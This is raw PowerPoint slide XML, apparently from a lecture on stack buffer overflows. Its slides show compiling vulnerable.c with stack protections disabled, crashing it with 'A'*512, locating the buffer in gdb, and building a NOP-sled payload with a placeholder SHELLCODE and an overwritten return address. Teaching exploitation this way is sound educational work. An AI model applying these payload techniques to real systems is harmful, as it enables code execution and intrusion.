        <p:nvSpPr>
          <p:cNvPr id="1003534" name="Text Box 14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477001" y="2272784"/>
            <a:ext cx="505267"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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003535" name="Text Box 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7467600" y="3644384"/>
            <a:ext cx="40267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a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>ax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003536" name="AutoShape 16"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7600950" y="295513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7" name="AutoShape 17"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6667500" y="99060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8" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4876800" y="480060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9" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="4800600"/>
            <a:ext cx="1905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41" name="Text Box 21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6461125" y="4044434"/>
            <a:ext cx="441146"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esi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003542" name="Text Box 22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7451725" y="5416034"/>
            <a:ext cx="33855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si</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1003543" name="AutoShape 23"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16210247">
            <a:off x="7524750" y="472678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44" name="AutoShape 24"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="6591300" y="276225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173349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35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35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352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352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035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035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035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035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035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035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035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035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035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035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035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035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03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31" grpId="0" animBg="1"/>
      <p:bldP spid="1003532" grpId="0" animBg="1"/>
      <p:bldP spid="1003533" grpId="0" animBg="1"/>
      <p:bldP spid="1003534" grpId="0"/>
      <p:bldP spid="1003535" grpId="0"/>
      <p:bldP spid="1003536" grpId="0" animBg="1"/>
      <p:bldP spid="1003537" grpId="0" animBg="1"/>
      <p:bldP spid="1003538" grpId="0" animBg="1"/>
      <p:bldP spid="1003539" grpId="0" animBg="1"/>
      <p:bldP spid="1003541" grpId="0"/>
      <p:bldP spid="1003542" grpId="0"/>
      <p:bldP spid="1003543" grpId="0" animBg="1"/>
      <p:bldP spid="1003544"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latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -Wall -O0 -g -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-omit-frame-pointer -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-deprecated-declarations -D_FORTIFY_SOURCE=0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-pie -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-format -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-format-security -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>norelro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-protector -m32 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-boundary=2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>vulnerable.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>test</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ ./</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `python -c "print 'A'*512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Segmentation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fault (core dumped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </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en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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r `python -c "print 'A'*512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Program received signal SIGSEGV, Segmentation fault</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x41414141 in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>?? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>vulnerable_function</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Breakpoint 1 at 0x80483cd: file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>vulnerable.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, line 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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r `python -c "print 'A'*512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">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p/x &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>3 = 0xffffce0c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>210</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80134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47500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr mar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a.out</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> `python -c "print '\x90'*400 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>SHELLCODE + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'*512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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Segmentation fault (core dumped</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr mar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gdb</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a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>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b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>vulnerable_function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> Breakpoint 1 at 0x80483cd: file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>vulnerable.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>, line 5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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r `python -c "print '\x90'*400 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>SHELLCODE + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'\x0c\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'*512</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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p &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>copy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>1 = (char (*)[512]) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0xffffc65c</a:t>
            </a:r>
          </a:p>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r `python -c "print '\x90'*400 + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>SHELLCODE + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>'\x5c\xc6\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
